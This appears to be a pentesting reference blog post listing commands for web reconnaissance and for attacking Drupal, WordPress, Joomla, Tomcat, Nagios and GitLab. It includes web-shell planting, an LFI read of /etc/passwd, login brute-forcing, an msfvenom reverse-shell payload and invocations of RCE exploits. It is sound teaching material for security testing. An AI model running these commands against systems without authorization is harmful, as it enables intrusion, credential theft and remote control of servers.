Home Pentesting - Pentesting Web
Post
Cancel

Pentesting - Pentesting Web

Incorrect DNS Resolution

The domain and IP need to be added in the /etc/hosts file:

1
sudo nano /etc/hosts

CMS Scanner

Tool - cmsmap

Command syntax:

1
python cmsmap.py https://<IP>

URL to download it: github-cmsmap

Tool - cmseek

1
python3 cmseek.py -u <domain.com>

More info in: CMSeeK

Sniffers

Wireshark

Tcpdump

https://github.com/DanMcInerney/net-creds

https://github.com/lgandx/PCredz

Test SSL Certificate

Tool - Testssl

Syntax:

1
./testssl.sh <domain.com>

URL to download it: Github

Vulnerability Web Scanner

Tool - Nikto

Syntax:

1
nikto -h <http://IP>

Tool - Nuclei

Syntax:

1
nuclei -u <https://IP>

More information and download it: https://github.com/projectdiscovery/nuclei

Other automatic Tools

  • recon-ng

  • Nessus

  • OpenVAS

Tools for Testing Web Applications

Burpsuite: intruder, repeater, intercept

Owasp ZAP: Hub to view hidden fields, crawling, etc.

Tools to Discover Web Technology

Whatweb

1
whatweb http://<IP>

Wappalyzer

Curl and wget Commands

Curl and Wget are both command-line tools used for downloading files from the internet. They valuable utilities for fetching files and data from web servers efficiently.

Curl

Example:

1
curl <http://<IP>/<file.txt>>

Wget

Example:

1
wget <http://<IP>/<file.txt>>

Example to do it recursively:

1
wget <http://IP> -r

Tool for Detecting WAF (Web Application Firewall)

wafw00f

Command example:

1
wafw00f <https://domain.org>

URL to github: wafw00f

Add a Proxy to route all Traffic

Burpsuite and OwaspZAP are very good tools for it.

Proxychains is a very useful tool in Linux, which routes all traffic coming from any command-line tool to any proxy we specify. 

Proxychains adds a proxy to any command-line tool and is hence the simplest and easiest method to route web traffic of command-line tools through our web proxies.

To use proxychains, we first have to edit /etc/proxychains.conf, comment out the final line and add a new line at the end of it.

Example of new line:

1
http 127.0.0.1 8080

Example to run a curl command with proxychains:

1
proxychains curl http://SERVER_IP:PORT

If we go to our web proxy (Burpsuite for example), we will see that the request has indeed gone through it.

It can be done with Metasploit, with the parameter RPROXIES.

Example:

1
set RPROXIES HTTP:127.0.0.1:8080

Enumerate DNS Information about a Domain

Tool - dnsenum

Command syntax:

1
dnsenum -o <output.xml> <example.com>

Tool - whois

Command syntax:

1
whois <IP or domain>

Tool - Nslookup

Command syntax:

1
nslookup [options] [domainName]

Web Content Scanner and Fuzzing

dirb is an Interesting tool to find subdirectories:

1
dirb <http://target> <pathWordlist>

Fuzzing for Subdomains and Subdirectories

ffuf is an interesting tool to find subdirectories and subdomains.

FInd subdirectories:

1
ffuf -w <pathWordlist>:FUZZ -u https://target/FUZZ

GET - Parameter fuzzing:

1
ffuf -w </path/to/values.txt> -u <https://target/script.php?valid_name=FUZZ> -fc 401

POST - Parameter fuzzing:

1
ffuf -w /path/to/postdata.txt -X POST -d "username=admin\&password=FUZZ" -u https://target/login.php -fc 401

Find subdomains:

1
ffuf -w <subdomains.txt> -u <http://website.com/> -H “Host: FUZZ.website.com”

Example:

1
ffuf -w namelist.txt:FUZZ -u http://10.129.203.101/ -H 'Host:FUZZ.inlanefreight.local' -fs 15157

Useful dictionary: /SecLists/Discovery/DNS/subdomains-top1million-5000.txt

Find extensions:

1
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt:FUZZ -u http://SERVER_IP:PORT/blog/indexFUZZ

To find files with the extension php:

1
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://<SERVER_IP>:<PORT>/FUZZ.php

To find parameters:

1
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value'

Filter by size or by code to see the different ones:

1
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

To find LFI with that parameter found:

1
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://165.22.118.93:30678/index.php?view=FUZZ' -fs 1935

Tip: In PHP, “POST” data “content-type” can only accept “application/x-www-form-urlencoded”. So, we can set that in “ffuf” with “-H ‘Content-Type: application/x-www-form-urlencoded’”.

Example:

1
curl <http://admin.academy.htb:PORT/admin/admin.php> -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded'

Parameter ‘fc’ status code.

Parameter ‘fs’ response size.

More Tools - Find Subdomains

Sublist3r

https://github.com/aboul3la/Sublist3r

CTR - Online tool

https://crt.sh/

dnsenum

1
dnsenum --dnsserver 10.129.14.128 --enum -p 0 -s 0 -o subdomains.txt -f /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt inlanefreight.htb

Zone Transfer

Zone transfer in pentesting is the process of obtaining DNS zone data from a target to gather valuable information about its domain names, subdomains, and network structure, helping to identify potential vulnerabilities and entry points.

  1. Identifying Nameservers
1
nslookup -type=NS zonetransfer.me
  1. Perform the Zone transfer using -type=any and -query=AXFR parameters. Testing for ANY and AXFR Zone Transfer
1
nslookup -type=any -query=AXFR zonetransfer.me nsztm1.digi.ninja

Example Subdomain Brute Forcing

1
for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.inlanefreight.htb @10.129.14.128 | grep -v ';\|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done

Try zone transfer

Example:

1
dig axfr @<IP> <domain.com>

Pentest Common CMS

Drupal

Discovery

A Drupal website can be identified in several ways, including by the header or footer message Powered by Drupal, the standard Drupal logo, the presence of a CHANGELOG.txt file or README.txt file, via the page source, or clues in the robots.txt file such as references to /node.

1
curl -s http://drupal.domain.local | grep Drupal

Another way to identify Drupal CMS is through nodes. Drupal indexes its content using nodes. A node can hold anything such as a blog post, poll, article, etc. The page URIs are usually of the form /node/<nodeid>.

Enumeration

1
curl -s http://domain.local/CHANGELOG.txt | grep -m2 ""

Tool - droopescan

Droopescan is an open-source tool designed to perform vulnerability scans on Drupal-based content management systems (CMS). It aims to identify potential weaknesses and vulnerabilities in websites that use the Drupal CMS.

Command:

1
droopescan scan drupal -u <http://example.org/> -t 32

More info: https://github.com/droope/droopescan

Tool - drupwn

Drupwn is a tool used for gathering information and performing security assessments on Drupal websites. It helps identify potential vulnerabilities and weaknesses in websites that use the Drupal content management system.

Command:

1
python3 drupwn --mode enum --target <https://example.com>
1
python3 drupwn --mode exploit --target https://example.com

More info: drupwn

Vulnerability - Drupalgeddon

Exploit Drupalgeddon: https://www.exploit-db.com/exploits/34992

1
python2.7 drupalgeddon.py -t http://domain.local -u <user> -p <password>

We could also use the exploit/multi/http/drupal_drupageddon Metasploit module to exploit this.

Exploit Drupalgeddon2: https://www.exploit-db.com/exploits/44448

Exploit Drupalgeddon3: https://github.com/rithchard/Drupalgeddon3

In Metasploit: multi/http/drupal_drupageddon3

Wordpress

Tool - wpscan

Install it:

1
sudo gem install wpscan

Command syntax:

1
wpscan --url http://<IP>/ --enumerate

Looking for users, command example:

1
wpscan -e u -t 500 --url http://<domain>

Plugins:

1
wpscan --url http(s)://<domain> --enumerate p

Vulnerable plugins:

1
wpscan --url http(s)://<domain> --enumerate vp

Brute force:

1
wpscan --url http://<domain> -P <passwords.txt> -U <users.txt>

Brute force to xmlrpc login:

The wp-login method will attempt to brute force the standard WordPress login page, while the xmlrpc method uses WordPress API to make login attempts through /xmlrpc.php. The xmlrpc method is preferred as it’s faster.

1
sudo wpscan --password-attack xmlrpc -t 20 -U <user> -P <pathWordlist> --url http://<domain>

Interesting paths:

/wp-admin: login /wp-content/uploads: files contained on the server.

Manual - Discovery themes

1
curl -s http://<domain>/ | grep themes

Manual - Discovery plugins

1
curl -s http://<domain>/ | grep plugins

Other way:

1
nmap -sV --script http-wordpress-enum <IP>

Code Execution

With administrative access to WordPress, we can modify the PHP source code to execute system commands. Click on Appearance on the side panel and select Theme Editor. This page will let us edit the PHP source code directly. An inactive theme can be selected to avoid corrupting the primary theme.

Click on Select after selecting the theme, and find a page to edit it.

If for example, we can edit a page such as 404.php to add a web shell.

Click on Update File at the bottom to save. We know that WordPress themes are located at /wp-content/themes/<theme name>. We can interact with the web shell via the browser or using cURL. As always, we can then utilize this access to gain an interactive reverse shell and begin exploring the target.

Example of RCE:

1
curl http://<domain>/wp-content/themes/twentynineteen/404.php?0=id

Metasploit has a module that uploads a malicious plugin and then uses it to execute a PHP Meterpreter shell.

1
msf6 > use exploit/unix/webapp/wp_admin_shell_upload 

Vulnerable plugins - mail mastra

The source code has a parameter that allows including a file without any validation or input sanitization. By using this, we can include arbitrary files on the web server. Let’s take advantage of this to retrieve the content of the file ‘/etc/passwd’ using ‘cURL’.

1
curl -s http://domain.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

Vulnerable plugin - wpDiscuz

The exploit script takes two parameters: -u the URL and -p the path to a valid post.

Example:

1
python3 wp_discuz.py -u http://domain.local -p /?p=1

We can use cURL to execute commands using the uploaded web shell. We just need to append ?cmd= after the .php extension to run commands which we can see in the exploit script.

1
curl -s http://domain.local/wp-content/uploads/2021/08/shell.php?cmd=id

Joomla

Fingerprinting

1
curl -s http://domain.local/ | grep Joomla

We can fingerprint the Joomla version if the README.txt file is present:

1
curl -s http://domain.local/README.txt | head -n 5

In certain Joomla installs, we may be able to fingerprint the version from JavaScript files in the media/system/js/ directory or by browsing to administrator/manifests/files/joomla.xml.

1
curl -s http://domain.local/administrator/manifests/files/joomla.xml | xmllint --format

The cache.xml file can help to give us the approximate version. It is located at plugins/system/cache/cache.xml.

Tool - droopscan

Github: https://github.com/SamJoan/droopescan

Install it:

1
sudo pip3 install droopescan

Command example:

1
droopescan scan joomla --url http://domain.local/

Tool - JoomlaScan

Github: https://github.com/drego85/JoomlaScan

Install it:

1
2
3
4
5
sudo python2.7 -m pip install urllib3

sudo python2.7 -m pip install certifi

sudo python2.7 -m pip install bs4

Command example:

1
python2.7 joomlascan.py -u http://domain.local

Tool - Joomla-bruteforce

This tool do brute force attack to login.

Github: https://github.com/ajnik/joomla-bruteforce

Example:

1
sudo python3 joomla-brute.py -u http://domain.local -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr <user>

Vulnerability CVE-2019-10945

Github: https://github.com/dpgg101/CVE-2019-10945

Exploit: https://www.exploit-db.com/exploits/46710

Example:

1
python2.7 joomla_dir_trav.py --url "http://domain.local/administrator/" --username admin --password admin --dir /

Tomcat

Interesting paths:

/etc/tomcat9/tomcat-users.xml /manage /manager /host-manager /docs

Default credentials

tomcat:tomcat admin:admin

Footprinting/discovery

Syntax:

1
curl -s http://<domain>:<port>/docs/ | grep Tomcat

Upload a Reverse shell

  1. Create a reverse shell with msfvenom. Example:
1
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<port> -f war -o <file.war>
  1. Upload into WAR File.
  2. When executing the uploaded file, the connection is opened.

Other option is to do it with Metasploit (the shell should be uploaded in path /manage)

Tomcat Manager - Login Brute Force

Metasploit module -> scanner/http/tomcat_mgr_login

Other way - exploit:

Exploit: https://github.com/b33lz3bub-1/Tomcat-Manager-Bruteforce

Example:

1
python3 mgr_brute.py -U http://<domain>:<port>/ -P /manager -u /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt -p /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt

CVE-2020-1938 : Ghostcat

Command:

1
nmap -sV -p 8009,8080 <domain>

PoC: https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi

Code:

1
python2.7 tomcat-ajp.lfi.py <domain> -p <port> -f WEB-INF/web.xml

In some Tomcat installs, we may be able to access sensitive data within the WEB-INF file.

Synfony

Tool - eos

https://github.com/synacktiv/eos

Installation

1
2
$ git clone https://github.com/Synacktiv/eos
$ python3 -m pip install --user ./eos

Example of usage:

1
eos scan http://domain.com --output results

Nagios

Exploit: https://www.exploit-db.com/exploits/49422

Example:

1
python3 nagiosxi-rce.py http://domain.local username password 10.10.14.236 5555

Pentest Applications

Git

This command is used to download a repository stored on web server and restore deleted files.

Syntax:

1
./gitdumper.sh http://<IP>/.git/ <pathOutput>

To view repository status and deleted files:

1
git status

To restore a delete file:

1
git checkout <fileToDownload>

GitLab

It is a web-based Git-repository hosting tool that provides wiki capabilities, issue tracking, and continuous integration and deployment pipeline functionality. It is open-source and originally written in Ruby, but the current technology stack includes Go, Ruby on Rails, and Vue.js.

Interesting paths:

/help /users/sing_in /explore

Username Enumeration

Exploit: https://www.exploit-db.com/exploits/49821

Other exploit: https://github.com/dpgg101/GitLabUserEnum

Command example:

1
./gitlab_userenum.sh --url http://<domain>:<port>/ --userlist <users.txt>

or:

1
python3 gitlab_userenum.py --url http://<domain>:<port>/ --wordlist <pathWordlist>

Caution ->  GitLab’s defaults are set to 10 failed attempts resulting in an automatic unlock after 10 minutes.

Authenticated Remote Code Execution (RCE)

Exploit RCE: https://www.exploit-db.com/exploits/49951

Example of reverse shell:

1
python3 gitlab_13_10_2_rce.py -t http://<domain>:<port> -u <user> -p <password> -c '<reverseShellCode>'
This post is licensed under CC BY 4.0 by the author.